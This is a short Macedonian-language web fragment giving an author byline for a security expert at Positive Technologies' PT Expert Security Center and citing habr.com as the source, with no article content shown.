  • Π•Π³ΠΎΡ€ Подмоков, СкспСрт, ПВ ЕкспСртски бСзбСдносСн Ρ†Π΅Π½Ρ‚Π°Ρ€, ΠŸΠΎΠ·ΠΈΡ‚ΠΈΠ²Π½ΠΈ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ

Π˜Π·Π²ΠΎΡ€: www.habr.com

Π”ΠΎΠ΄Π°Π΄Π΅Ρ‚Π΅ ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€